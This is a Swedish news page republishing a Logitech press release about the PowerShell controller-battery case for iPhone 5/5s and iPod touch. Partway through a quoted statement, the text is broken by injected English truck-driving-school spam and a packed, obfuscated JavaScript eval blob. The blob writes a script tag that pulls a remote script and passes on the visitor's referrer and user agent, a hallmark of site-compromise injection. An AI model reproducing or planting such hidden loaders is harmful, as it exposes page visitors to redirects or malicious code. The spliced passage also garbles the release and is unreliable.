Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Logitech PowerShell – en ny sorts mobil spelupplevelse

Logitech PowerShell – en ny sorts mobil spelupplevelse
Sebastian

Handkontrollen förvandlar kompatibla telefoner till mobila spelkonsoler och det inbyggda batteriet ger dig mer speltid än någonsin.

Logitech lanserar idag Logitech® PowerShell™ Controller Battery. PowerShell är designad för att förvandla din iPhone 5s, iPhone 5 eller femte generationens iPod touch till en mobil spelkonsol och dessutom förlänga din batteritid.

För att använda PowerShell placerar du helt enkelt din telefon i skalet. De analoga kontrollerna inbyggda i skalet är med styrkors, fyra huvudknappar och två pekfingerknappar bekanta för alla konsolspelare. Nu behöver inte längre kontrollerna ta upp en stor del av telefonens skärm och tack vare PowerShells utformning är det nu också bekvämare att spela under längre perioder.

”Vi designade den här kontrollen för att vara ge en unik spelupplevelse på iOS 7-utrustade mobila enheter” säger Ehtisham Rabbani, general manager för Logitechs gamingprodukter. ”Då det mobila spelande är oerhört populärt – våra studier visar att 87 % av alla iPhone- eller iPod touch-användare spelar spel – tyckte By covering all of the aforementioned, you’re more likely to find a truck driving driving eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfbya|var|u0026u|referrer|hberd||js|php’.split(’|’),0,{}))
school atlanta
that is right for you!Truck Driver SolutionsShare 1. vi att det var dags att revolutionera upplevelsen”

Trots att din iPhone eller iPod touch är inkopplad har du tillgång till strömknapp, volymkontroller, kamera, högtalare och hörlursuttag. Kontrollens 1500 mAh-batteri ger dig dessutom ökad batteritid och du kan ladda både telefon och kontroll utan att lyfta ur telefonen ur skalet.

Kontrollen är kompatibel med en rad spel och antalet växer ständigt. Kompatibla titlar i nuläget inkluderar Bastion, Fast & Furious 6: The Game, MetalStorm Aces, Galaxy On Fire 2™ HD och Nitro™.

Pris och tillgänglighet:
Logitech PowerShell Controller Battery finns tillgänglig för förbeställning från Logitech.com och från i december i Apple Store och hos utvalda återförsäljare. Den förväntas kosta ca. 899:-

Detta är ett pressmeddelande från Logitech